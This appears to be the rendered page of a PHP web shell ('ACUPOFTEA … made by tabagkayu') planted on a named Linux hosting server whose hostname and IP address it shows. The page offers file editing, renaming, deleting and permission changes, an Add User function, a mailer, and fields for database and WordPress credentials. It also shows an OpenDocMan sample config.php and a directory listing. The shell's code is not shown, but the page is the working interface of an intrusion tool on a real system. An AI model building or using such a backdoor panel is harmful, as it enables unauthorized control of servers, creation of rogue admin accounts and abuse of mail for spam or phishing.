System
:
Linux server1.ontime-gulf.com 4.18.0-553.5.1.el8_10.x86_64 #1 SMP Wed Jun 5 09:12:13 EDT 2024 x86_64
Software
:
Apache
Server
:
162.0.230.206
Domains
:
40 Domain
Permission
:
[
drwxr-xr-x
]
:
/
var
/
softaculous
/
odm
/
216.73.216.50
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for mail.ontime-ae.com made by tabagkayu.
Folder Name
File Name
File Content
File
config.php
<?php /* * Copyright (C) 2000-2021. Stephen Lawrence * * This program is free software; you can redistribute it and/or * modify it under the terms of the GNU General Public License * as published by the Free Software Foundation; either version 2 * of the License, or (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, write to the Free Software * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ // OpenDocMan sample config file // Eliminate multiple inclusions if (!defined('config')) { define('config', 'true', false); // config.php - you should not need to change these /** The name of the database for [OpenDocMan */ define('APP_DB_NAME', isset($_ENV['APP_DB_NAME']) ? $_ENV['APP_DB_NAME'] : '[[softdb]]'); /** MySQL database username */ define('APP_DB_USER', isset($_ENV['APP_DB_USER']) ? $_ENV['APP_DB_USER'] : '[[softdbuser]]'); /** MySQL database password */ define('APP_DB_PASS', isset($_ENV['APP_DB_PASS'])? $_ENV['APP_DB_PASS'] : '[[softdbpass]]'); /** MySQL hostname */ /* The MySQL server. It can also include a port number. e.g. "hostname;port=3306" or a path to a * local socket e.g. ":/path/to/socket" for the localhost. */ define('APP_DB_HOST', isset($_ENV['APP_DB_HOST']) ? $_ENV['APP_DB_HOST'] : '[[softdbhost]]'); /** * Prefix to append to each table name in the database (ex. odm_ would make the tables * named "odm_users", "odm_data" etc. Leave this set to the default if you want to keep * it the way it was. If you do change this to a different value, make sure it is either * a clean-install, or you manually go through and re-name the database tables to match. * @DEFAULT 'odm_' * @ARG String */ $GLOBALS['CONFIG']['db_prefix'] = isset($_ENV['DB_PREFIX']) ? $_ENV['DB_PREFIX'] : '[[dbprefix]]'; /*** DO NOT EDIT BELOW THIS LINE ***/ /** Absolute path to the OpenDocMan directory. */ if (!defined('ABSPATH')) { if(isset($_ENV['IS_DOCKER'])) { define('ABSPATH', dirname(__FILE__) . '/../'); } else { define('ABSPATH', dirname(__FILE__) . '/'); } } }
New name for
Are you sure will delete
?
New date for
New perm for
Name
Type
Size
Permission
Last Modified
Actions
.
DIR
-
drwxr-xr-x
2024-06-25 09:44:40
..
DIR
-
drwxr-xr-x
2025-10-25 09:38:52
images
DIR
-
drwxr-xr-x
2024-06-25 09:44:40
php53
DIR
-
drwxr-xr-x
2024-06-25 09:44:40
php56
DIR
-
drwxr-xr-x
2024-06-25 09:44:40
php71
DIR
-
drwxr-xr-x
2024-06-25 09:44:40
php81
DIR
-
drwxr-xr-x
2024-06-25 09:44:40
php82
DIR
-
drwxr-xr-x
2024-06-25 09:44:40
__upgrade.php
text/x-php
2.57 KB
-rw-r--r--
2021-12-23 06:54:36
__upgrade.xml
text/plain
456 B
-rw-r--r--
2021-12-23 06:54:36
changelog.txt
text/plain
3.07 KB
-rw-r--r--
2021-12-23 06:54:36
clone.php
text/x-php
3.17 KB
-rw-r--r--
2024-05-02 08:14:52
config.php
text/x-php
2.46 KB
-rw-r--r--
2021-12-23 06:54:36
edit.php
text/x-php
4.39 KB
-rw-r--r--
2024-05-02 08:14:52
edit.xml
text/html
433 B
-rw-r--r--
2021-12-23 06:54:36
fileindex.php
text/plain
1.12 KB
-rw-r--r--
2021-12-23 06:54:36
import.php
text/x-php
5.29 KB
-rw-r--r--
2024-05-02 08:14:52
info.xml
text/html
1.72 KB
-rw-r--r--
2024-05-02 06:25:50
install.js
text/plain
921 B
-rw-r--r--
2021-12-23 06:54:36
install.php
text/x-php
4.55 KB
-rw-r--r--
2024-05-02 08:14:52
install.xml
text/html
2.12 KB
-rw-r--r--
2021-12-23 06:54:36
md5
text/plain
5.23 KB
-rw-r--r--
2024-05-02 08:14:52
notes.txt
text/plain
645 B
-rw-r--r--
2021-12-23 06:54:36
~ ACUPOFTEA - mail.ontime-ae.com